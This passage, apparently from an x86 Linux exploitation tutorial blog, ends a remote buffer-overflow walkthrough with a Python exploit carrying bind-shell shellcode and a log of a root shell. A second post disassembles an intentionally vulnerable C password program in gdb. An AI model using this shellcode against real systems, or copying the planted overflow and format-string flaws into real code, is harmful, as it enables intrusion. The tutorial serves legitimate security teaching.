class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"402/span span class="c1"# (528 - 119) - 7 = 402/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"7/span span class="c1"# another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xb4\xf3\xff\xbf/spanspan class="s2"quot;/span span class="c1"# the address of our shellcode/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pFinally we can test the exploit against our application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanpython app-net-exploit.py/span span class="code-line"span class="gp"[email protected]:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"ls/span/span span class="code-line"span class="go"app-net/span/span span class="code-line"span class="go"secret.txt/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pI hope this has highlighted the differences between attacking local and remote applications. Different situations will always arise where you need to tweak the method you use to attack the application its best to be able to adapt to as many situations as possible./p pIt is a little more difficult to develop exploits for a remote applications and might not work when run against the actual target because of differences between the development environment and the actual target environment which is why its very important to try to replicate the target environment as much as possible./p pHappy Hacking :–)/p

Basic Binary Auditing

1 July 2014 at 10:32
By: 0xe7
pBefore I go into some of the protections that are commonly in place, I thought it would be best to show how to detect these 2 basic vulnerabilities using a href="https://en.wikipedia.org/wiki/Reverse_engineering" target="_blank"reverse engineering/a (as opposed to randomly a href="https://en.wikipedia.org/wiki/Fuzz_testing" target="_blank"fuzzing/a inputs as we did in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a and a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a)./p pReverse engineering (reversing) is an extremely powerful tool in the hackers arsenal and when there is no source code for the application that you are targeting nothing is better./p !-- more -- pa href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"Assembly/a is the language of reversing and a a href="https://en.wikipedia.org/wiki/Debugger" target="_blank"debugger/a is the most important tool./p pAssembly is essentially the language of the processor, the actual "machine code" that people think of what the computer deals with (whether viewed as binary or hex) is just a different representation of assembly language, so this is the lowest level programming language possible to those outside of processor firmware development./p pA debugger is an application that allows you to view an applications a href="https://en.wikipedia.org/wiki/Virtual_memory" target="_blank"virtual memory segment/a as the application itself views it, as well as change the values in sections of memory or a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a at run time./p pAnother important feature of a debugger is the ability to set a href="https://en.wikipedia.org/wiki/Breakpoint" target="_blank"breakpoints/a so you can force the application to stop execution at a specific part of the application and view values or a href="https://en.wikipedia.org/wiki/Stepping_%28debugging%29" target="_blank"step through/a the application instruction by instruction./p h2The App/h2 pWe will use the same basic application we used in parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis time we will not exploit this application (we've done that already), instead we'll just use the debugger it figure out that these vulnerabilities exist./p h2Setting Up The Environment/h2 pThis is the same as in part a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a so please refer to the strongSetting Up The Environment/strong section of 1 of those./p h2Looking For The Juicy Bits/h2 pFirst we'll test the application as usual:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"[email protected]:~$ echo $/span?/span span class="code-line"span class="go"1/span/span span class="code-line"/code/pre/div /td/tr/table pNothing unusual there but we now know that the application takes 1 argument. If we open this using codegdb/code we can have a closer look at it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"info functions/span/span span class="code-line"span class="go"All defined functions:/span/span span class="code-line"/span span class="code-line"span class="go"Non-debugging symbols:/span/span span class="code-line"span class="go"0x0804842e _init/span/span span class="code-line"span class="go"0x08048460 strcmp/span/span span class="code-line"span class="go"0x08048460 [email protected]/span/span span class="code-line"span class="go"0x08048470 printf/span/span span class="code-line"span class="go"0x08048470 [email protected]/span/span span class="code-line"span class="go"0x08048480 fclose/span/span span class="code-line"span class="go"0x08048480 [email protected]/span/span span class="code-line"span class="go"0x08048490 _IO_getc/span/span span class="code-line"span class="go"0x08048490 [email protected]/span/span span class="code-line"span class="go"0x080484a0 puts/span/span span class="code-line"span class="go"0x080484a0 [email protected]/span/span span class="code-line"span class="go"0x080484b0 __gmon_start__/span/span span class="code-line"span class="go"0x080484b0 __gmon[email protected]/span/span span class="code-line"span class="go"0x080484c0 exit/span/span span class="code-line"span class="go"0x080484c0 [email protected]/span/span span class="code-line"span class="go"0x080484d0 strlen/span/span span class="code-line"span class="go"0x080484d0 [email protected]/span/span span class="code-line"span class="go"0x080484e0 __libc_start_main/span/span span class="code-line"span class="go"0x080484e0 [email protected]/span/span span class="code-line"span class="go"0x080484f0 fopen/span/span span class="code-line"span class="go"0x080484f0 [email protected]/span/span span class="code-line"span class="go"0x08048500 putchar/span/span span class="code-line"span class="go"0x08048500 [email protected]/span/span span class="code-line"span class="go"0x08048510 strncpy/span/span span class="code-line"span class="go"0x08048510 [email protected]/span/span span class="code-line"span class="go"0x08048520 _start/span/span span class="code-line"span class="go"0x08048550 deregister_tm_clones/span/span span class="code-line"span class="go"0x08048580 register_tm_clones/span/span span class="code-line"span class="go"0x080485c0 __do_global_dtors_aux/span/span span class="code-line"span class="go"0x080485e0 frame_dummy/span/span span class="code-line"span class="go"0x0804860c main/span/span span class="code-line"span class="go"0x080486a2 checkpass/span/span span class="code-line"span class="go"0x080486f0 printfile/span/span span class="code-line"span class="go"0x08048760 __libc_csu_fini/span/span span class="code-line"span class="go"0x08048770 __libc_csu_init/span/span span class="code-line"span class="go"0x080487ca __i686.get_pc_thunk.bx/span/span span class="code-line"span class="go"0x080487d0 _fini/span/span span class="code-line"/code/pre/div /td/tr/table pHere we can tell that the application was written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a because it includes code__libc_start_main/code on lines 25 and 26. This means we have a codemain/code function which is the start of our application (shown on line 38)./p pThere are a couple of other functions of interest here but let's leave them for a bit and look at the codemain/code function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;[email protected];/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pThe first 4 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue" target="_blank"function prologue/a (lines 3, 4, 5 and 6). Here the a href="http://en.citizendium.org/wiki/Stack_frame" target="_blank"stack frame/a is set up./p pThe last 2 instructions are the a href="https://en.wikipedia.org/wiki/Function_prologue#Epilogue" target="_blank"function epilogue/a (lines 39 and 40). Here the codeleave/code instruction preforms the inverse of what the prologue did./p pLooking at the prologue and epilogue we can see that the a href="https://en.wikipedia.org/wiki/Calling_convention" target="_blank"calling convention/a is probably a href="https://en.wikipedia.org/wiki/X86_calling_conventions#cdecl" target="_blank"cdecl/a./p pI will not go into calling conventions much here, because it isn't terribly relevant although its important to know what they are and the differences, but a calling convention basically defines how a function is called./p pBack on topic, initially when looking for a vulnerability we should check some of the known vulnerable functions commonly used by developers. The main 1's are the codeprintf/code family of functions and the string copying/moving functions./p pLooking back at our list of functions, a couple of interest are being used. Mainly codeprintf/code and codestrncpy/code. In the main function though only codeprintf/code out of those 2 is being used. Let's examine them a little closer./p pThe first, on line 10, is set up on line 9 with an argument:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pWhat the first instruction is doing here is moving the address code0x80487f0/code into the address strongpointed to/strong by the a href="http://www.c-jump.com/CIS77/ASM/Stack/S77_0040_esp_register.htm" target="_blank"ESP register/a. These 2 lines relate to line 17 in our source code above./p pThe ESP register points to the top of the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a and in the cdecl calling convension, before the actual call to the function, its arguments are strongpushed/strong onto the stack in reverse order. As there is only 1 argument to this call only 1 is put on the stack./p pTo be honest, this call doesn't look like its going to be of interest as the argument is a static address and it points to the a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a of memory which isn't writable, but we can check the value of this just to make sure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x80487f0/span/span span class="code-line"span class="go"0x80487f0: quot;Usage: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo it looks to be part of an error message. The next call to codeprintf/code looks more interesting but first we need to understand how a stack frame is arranged in an application like this./p h2Stack Frames/h2 pBelow is the top of an example stack frame which is getting ready for a function call:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pHere we are unable to see the base pointer (EBP) but we can see the stack pointer (ESP) which always points to the top of the stack./p pPutting arguments on the stack can be done in a number of ways. Firstly it can be done using the codepush/code instruction as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span 